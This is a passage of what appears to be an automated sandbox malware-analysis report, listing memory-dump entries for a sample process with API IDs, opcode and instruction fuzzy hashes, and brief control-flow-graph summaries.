                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: SuspendThread
                                                            • String ID:
                                                            • API String ID: 3178671153-0
                                                            • Opcode ID: 761276c85f6fadfb52c52a6e5392a1e1ef176ea32c83e9ac6d668249a77b0e3b
                                                            • Instruction ID: ed2d605c9e516d9d3e2e5dcf36a5d34445ef0161a9e1e97367eed2a5838098de
                                                            • Opcode Fuzzy Hash: 761276c85f6fadfb52c52a6e5392a1e1ef176ea32c83e9ac6d668249a77b0e3b
                                                            • Instruction Fuzzy Hash: C6415C70E0864C8FDB58DFA8D899BEDBBF0FF5A310F10416AD049E7296DA70A845CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 71 7ffd9bc80ba5-7ffd9bc80c83 GetFileAttributesW 75 7ffd9bc80c8b-7ffd9bc80cc9 71->75 76 7ffd9bc80c85 71->76 76->75
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 652815b13e0e176822d3a093723186e74d5d5d0561ad66d136569d4fa148bb46
                                                            • Instruction ID: daf9e9c250e1fe32bdd4ac02dcdc3071384be272372e740af768c117542fd69e
                                                            • Opcode Fuzzy Hash: 652815b13e0e176822d3a093723186e74d5d5d0561ad66d136569d4fa148bb46
                                                            • Instruction Fuzzy Hash: 83411970E08A1C8FDB98DF98D895BEDBBF0FB59310F10416AD049E7251DA70A885CF41

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: e551ad0c5ffb21e4ebd16ef6cce4c253647d004fb6b133cd6ce5759ece163711
                                                            • Instruction ID: fc41e58c432a3f16320d17d5e4e5b5ebafd5ee837c46b42dcf25e14512a3ef69
                                                            • Opcode Fuzzy Hash: e551ad0c5ffb21e4ebd16ef6cce4c253647d004fb6b133cd6ce5759ece163711
                                                            • Instruction Fuzzy Hash: 77517972E0960F8FDB68DB98C4A05FDB7B0FF49381F1142BAD01AE7286DA346945CB44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 82a40e241cfbacf8a78b7ff90a066c499aca0586d29b4475b30728f087e9bacc
                                                            • Instruction ID: 0ca35eceeefe28ad2813b4e8fc6bd08396a5a6bc5d520b32afd277f452178b60
                                                            • Opcode Fuzzy Hash: 82a40e241cfbacf8a78b7ff90a066c499aca0586d29b4475b30728f087e9bacc
                                                            • Instruction Fuzzy Hash: CC414831E0860A8FDB69DBE4C4A05FDB7B1FF59304F1041BED02AA7696DA396942CB04

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 140 7ffd9bd239ff-7ffd9bd23a01 141 7ffd9bd23a62 140->141 142 7ffd9bd23a03-7ffd9bd23a1e 140->142 143 7ffd9bd23a64 141->143 142->141 145 7ffd9bd23a6f-7ffd9bd23b56 143->145 155 7ffd9bd23b57 145->155 155->155
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4226680419.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bd20000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e
                                                            • API String ID: 0-4024072794
                                                            • Opcode ID: 499620cadf0bb6ddeae425572cfc0f0ff75692be0c2b752b0836150ccee530ec
                                                            • Instruction ID: 362fc9652447033bacb286fba03a5c505e0194055f72617b2c1b1ad6791a645c
                                                            • Opcode Fuzzy Hash: 499620cadf0bb6ddeae425572cfc0f0ff75692be0c2b752b0836150ccee530ec
                                                            • Instruction Fuzzy Hash: F7318371A1DA4A8FEB68DF48C8A1D68B7E1FF58314F0401F9E00DD7696DA34A981CB42

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 156 7ffd9c1dccf8-7ffd9c1dcd23 157 7ffd9c1dd007-7ffd9c1dd029 156->157 158 7ffd9c1dd032-7ffd9c1dd033 157->158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 1d3141b850fee46d7565575adfd9924f6b4a2b20909a5f310ebf131e68df178a
                                                            • Instruction ID: e2fe7731cd961e563a53b18f7141029ed9d98523b0dce1010783067e94d19b64
                                                            • Opcode Fuzzy Hash: 1d3141b850fee46d7565575adfd9924f6b4a2b20909a5f310ebf131e68df178a
                                                            • Instruction Fuzzy Hash: 7C01A870A08A5DCFDF55DB98C894AACBBB1FF69345F20019DC00AEB651CA71A842DF00

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bba30e6c000cb0fa2c920cf5210404ac340a621615c0fad12c9565a808ddba5
                                                            • Instruction ID: 2f7853e0fa1d532f7abde0371ff659774ce5d7f9315a4088bec2bf9fa7c37161
                                                            • Opcode Fuzzy Hash: 9bba30e6c000cb0fa2c920cf5210404ac340a621615c0fad12c9565a808ddba5
                                                            • Instruction Fuzzy Hash: 0332A831F08A1A8FDBA8DB58C865A6877F1FF54350F5042B9D01EDB292DE24EC85CB85

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37ea0f0729297f7b6c525e18991883e0eab6c356de5aba047dae08f991186c0d
                                                            • Instruction ID: 5fd72cd28876b26b877fb4702cd39ee525635eac59f7018e8fcf6a29d0ec33f3
                                                            • Opcode Fuzzy Hash: 37ea0f0729297f7b6c525e18991883e0eab6c356de5aba047dae08f991186c0d
                                                            • Instruction Fuzzy Hash: D7D11722F0DA8B4FD7A5DB6884746B877F1EF99390F4506BAD00DD72E2EE18A805C345

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d6874b7b66dafd7b4156b914fedd3ac3fdcedbda20285fe9bdde2d1dae0b489
                                                            • Instruction ID: 4ab9f65b1c09b978d945fd4b91135768a7e2503c60a74f59de6fc7a60a239ff2
                                                            • Opcode Fuzzy Hash: 5d6874b7b66dafd7b4156b914fedd3ac3fdcedbda20285fe9bdde2d1dae0b489
                                                            • Instruction Fuzzy Hash: 64E1BE31A186078BEB19CF48C4E05B537B1FF45391B5546BDC85B8B68ADA38F882CB85

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27c8c67b6134a74240d0226017b27c3832f64140808fcc08355f895e289ff6e1
                                                            • Instruction ID: 5786057acfb643caa5566edffc7a5c834a30370f705da4a08d92c680408668ac
                                                            • Opcode Fuzzy Hash: 27c8c67b6134a74240d0226017b27c3832f64140808fcc08355f895e289ff6e1
                                                            • Instruction Fuzzy Hash: B8C12732E0DB478FD369DB64D4A04B477F0EF49350B9406BEC44AC75D2EA29B842CB86
                                                            • Opcode Fuzzy Hash: e65f7c3c1d571a86551e7da2c55ce060217275662cf77c9bdb8e86867dee4fbf
                                                            • Instruction Fuzzy Hash: 8D31723260C9498FEF9DEB18C469DA473E1FFB831470402AAE45AC7693CE25E855CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44f9fdf290bd90f1f6554a69ce19568e2afa49950e1b0ae6fe698bfd13685279
                                                            • Instruction ID: fb424171ea69a04ddaf8459044b60393cc954f727f2735346b07e8448bb8dfa8
                                                            • Opcode Fuzzy Hash: 44f9fdf290bd90f1f6554a69ce19568e2afa49950e1b0ae6fe698bfd13685279
                                                            • Instruction Fuzzy Hash: 9131607260C9458FDBACEF18C4A5EA477E1FFA8314B0402A9E05AC7693DE24E845CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83e1f354e77653ced006f9ba88d94b9456c8bb105a1b69b5e528b3e22b856867
                                                            • Instruction ID: 9563b0bd47f802e1a6f843a07810c58abf1bd96e368600c450ec0ff52a00e0c0
                                                            • Opcode Fuzzy Hash: 83e1f354e77653ced006f9ba88d94b9456c8bb105a1b69b5e528b3e22b856867
                                                            • Instruction Fuzzy Hash: B1412532B086078FE765AB64C4617E577E0FF41391F0047BAD44AC76C2EB28B445C795
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7820e7ddd63752705492ba1e4e9edb2eeb88a57bc228fd9923cce1b3a41d236d
                                                            • Instruction ID: 4ca793e6f96459c860a607645e75385ff5cc5badaa85fe3ca6917c015e8d9bc6
                                                            • Opcode Fuzzy Hash: 7820e7ddd63752705492ba1e4e9edb2eeb88a57bc228fd9923cce1b3a41d236d
                                                            • Instruction Fuzzy Hash: AE411632A086078FE768AB64C4606B5B7E0FF55361F1046BAD49EC76D2DF28B944C741
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b702dbf9231ae930d4905921d50f90329d8143bb8e3c8e8aed832a61acbc9c81
                                                            • Instruction ID: c88cca95b197a59073ba210e99bdfa2c57cb9250705deaa39a3c8f1f5c1e1172
                                                            • Opcode Fuzzy Hash: b702dbf9231ae930d4905921d50f90329d8143bb8e3c8e8aed832a61acbc9c81
                                                            • Instruction Fuzzy Hash: C931643260C9498FDFA8EF18C469DA473E1FF7831470402ADE05AD7693CE25E855CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de55b12327c0227855d7de0a7b44a8420b16b34fb5a345f4b1bfe9c8dbd05d0a
                                                            • Instruction ID: 2d50da06dce2afd0564483abb8b781e3d1acb4adff2046f1ff0bb624831a3b62
                                                            • Opcode Fuzzy Hash: de55b12327c0227855d7de0a7b44a8420b16b34fb5a345f4b1bfe9c8dbd05d0a
                                                            • Instruction Fuzzy Hash: 8031527260C9058FDBACEF18C465EA477E1FFA8314B0402A9E05AD7692DE28E845CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eaedc93083b7bc48953cf9ce2993228ed3e6cf346dbd34c73c019a338a928838
                                                            • Instruction ID: 43f07a32f558e6c8fdc67260d455fec7dc414df641802e9e344922786a6e9f89
                                                            • Opcode Fuzzy Hash: eaedc93083b7bc48953cf9ce2993228ed3e6cf346dbd34c73c019a338a928838
                                                            • Instruction Fuzzy Hash: 31411532E1D68E8FDB95DBA8C8605ED7BB0FF06304F4401FAD04AE71A2DA246815DB19
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d8ec6cad859fe30df963ae121c2cdd10907037f1f4123060fbb8b919d4f972f
                                                            • Instruction ID: 753f582802accc0f9e38bf67b78c97513299e3b0ad588b1cabb958524b5748d4
                                                            • Opcode Fuzzy Hash: 1d8ec6cad859fe30df963ae121c2cdd10907037f1f4123060fbb8b919d4f972f
                                                            • Instruction Fuzzy Hash: 6631E721D4E3C68FE753937498646E93FB1AF43364F1802EAE086DE0E3D6990556C716
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e06660dad724cc28d3f53cb31c1e1e74a15a77f270c7a742d6b73c85b8e6d6ce
                                                            • Instruction ID: f3c261a670d09926d345625556cd1604e225356115ece503532f754998fa255d
                                                            • Opcode Fuzzy Hash: e06660dad724cc28d3f53cb31c1e1e74a15a77f270c7a742d6b73c85b8e6d6ce
                                                            • Instruction Fuzzy Hash: D531D112E4E6D60FEB2757B448745B13FB19F93190F0A46FAE4888B0E3EE0DA8058342
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c44daf692bff26a899df15002cfd476dc999467e75f98b5552e322adee592875
                                                            • Instruction ID: 2e5b8fff96ae9c5ff1ce6fca1224aee338c1896b0621bbb775dc5a12a7f834d2
                                                            • Opcode Fuzzy Hash: c44daf692bff26a899df15002cfd476dc999467e75f98b5552e322adee592875
                                                            • Instruction Fuzzy Hash: 7B310930A1495D8FDF94EF98C895AEDB7F1FFA8315F11016AE40DE32A5DB34A9418B80
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b75db4e8625c85fcc5faf4703a79e508afd46a96540c4f530eeeeddba02a0fb
                                                            • Instruction ID: e80f36f364aeb97d92de899071603d781120dd43a8eb674baced1ae15063067e
                                                            • Opcode Fuzzy Hash: 0b75db4e8625c85fcc5faf4703a79e508afd46a96540c4f530eeeeddba02a0fb
                                                            • Instruction Fuzzy Hash: 6831B272F0D90A5FDB58EB98D4A15B8B3B1FF99360B154639D00ED3682DF24B852CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4226680419.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bd20000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d37cc085fc05bf95924bd20086c785d235126978eaeaabfe5b186b22fe615f6
                                                            • Instruction ID: 95f8fdb8f817737c0177fbb3c3444641890fb189f8702a174656492f4dc0db5c
                                                            • Opcode Fuzzy Hash: 3d37cc085fc05bf95924bd20086c785d235126978eaeaabfe5b186b22fe615f6
                                                            • Instruction Fuzzy Hash: F6316671F1DA894FEBA8DF588865964B7E1FF68314F0501FEA04DC3192DA35A9818B02
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b259ddca55e6de22ae30204cb8c49562295aa69ecb99fa6c76a73809f5be22a
                                                            • Instruction ID: 15bffe4eeaf965be2ba7e858885143ada8f021d3e2974b8b70da68ad348c14a7
                                                            • Opcode Fuzzy Hash: 9b259ddca55e6de22ae30204cb8c49562295aa69ecb99fa6c76a73809f5be22a
                                                            • Instruction Fuzzy Hash: F331C672F0DA474FFBA9A7A848722B877B1EF55351F14027AD01ED36C2EE58780183A5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adc36214bcaa12707eb2fd6a18840c14dc20f464794fa8e73167745184127e6b
                                                            • Instruction ID: aafe96abc5b4ad1c37273bf2dcbc323abd7a635ea1029ad7e01d456b9805e0d1
                                                            • Opcode Fuzzy Hash: adc36214bcaa12707eb2fd6a18840c14dc20f464794fa8e73167745184127e6b
                                                            • Instruction Fuzzy Hash: DB210773F1DA4B4FEB6CA6A844621F877E1EF95361F24027AD05ED31C3EF1868018685
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 937885b8bfbc8df68d3c21e54f6e976e533a400f2f7d103d47c09e3e1d52f594
                                                            • Instruction ID: 19135d24f05f81b50b937d2921ab45c68e7206ec6222916ae4632090b17c988f
                                                            • Opcode Fuzzy Hash: 937885b8bfbc8df68d3c21e54f6e976e533a400f2f7d103d47c09e3e1d52f594
                                                            • Instruction Fuzzy Hash: 7031B332E1CA8E8FDB64DBA8C8605FD7BB0FF55340F4401FAD009E72A2DA246915DB55
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ee1609fddf71f8fdb0f45088ce82e2873be3a8e64adb6f72b0024e5749e7387
                                                            • Instruction ID: ce2ad6e57bebd3c45fd1359f074b2ecbc57d204c7e8e34179a59915b3e98a8c6
                                                            • Opcode Fuzzy Hash: 7ee1609fddf71f8fdb0f45088ce82e2873be3a8e64adb6f72b0024e5749e7387
                                                            • Instruction Fuzzy Hash: 42312C32E1850BCFDBA8EF9484619FD77B1FF44344F50027AD00EE7581EA38A9449B59
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9708f56b9e5b2816e6a855b50ce7046c782e10ec9776c6ca098dc260b66afb71
                                                            • Instruction ID: c041e27352e1170fbcea10d85b809e17230ca4e1b2433e2dc7b8d8f1f7763c3a
                                                            • Opcode Fuzzy Hash: 9708f56b9e5b2816e6a855b50ce7046c782e10ec9776c6ca098dc260b66afb71
                                                            • Instruction Fuzzy Hash: 03219132E5C68E8FCB55DBA4D8705AD7BB1FF59350F1006BAD00AE7292EA346805CB54
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64ae3dc4e5d148ba11270444e1e360a838c18b39c126731a34ea0714f160fc2b
                                                            • Instruction ID: e9690df120a3d20aa74882a0d519941e72eeba7202b552202c9708ba89d9bbb3
                                                            • Opcode Fuzzy Hash: 64ae3dc4e5d148ba11270444e1e360a838c18b39c126731a34ea0714f160fc2b
                                                            • Instruction Fuzzy Hash: 2F31A970A0852D8ECFA8DF14C855BAAB7B1FB68315F1042EE814EE32A5DB755A80CF45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa3aaa3ee23f2b900cefde29cc141d0f3607b9d6a811dbfbdc828ead950b1143
                                                            • Instruction ID: 4921f92245644c1c00a46bfcc8257745e4a63d247a19b8d59049caacee6d24d9
                                                            • Opcode Fuzzy Hash: fa3aaa3ee23f2b900cefde29cc141d0f3607b9d6a811dbfbdc828ead950b1143
                                                            • Instruction Fuzzy Hash: D1310E32E1C54FCFDBA9DB8484A5ABD77B1FF44380F90017AD40EE31A1DA39A940AB45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 453f51cf3a2ba1e0b78377b252f6892a861fddd38f7e13175bf521d3d886a2e0
                                                            • Instruction ID: 147f1736dd31ae58bd21667660fa10ec558296b440d5d15db9bab6cd4649b997
                                                            • Opcode Fuzzy Hash: 453f51cf3a2ba1e0b78377b252f6892a861fddd38f7e13175bf521d3d886a2e0
                                                            • Instruction Fuzzy Hash: 7D21F871B0C54A8FDB98DF28D4659B937E1EF99350B1002BBE04FCB2E6EE24A8418741
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ef8efef077922861799230e4151af0e5caddcbc6704d68ba74da3a520930d4b
                                                            • Instruction ID: d0f3b3173e04523ef5dd932c0435ed8a753085d2c986264448e1e762e75ceba5
                                                            • Opcode Fuzzy Hash: 0ef8efef077922861799230e4151af0e5caddcbc6704d68ba74da3a520930d4b
                                                            • Instruction Fuzzy Hash: 19318F11E1C5AB4AE739835884705B57B71FF9639271987FAD08ACF4CBE92CB881C346
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
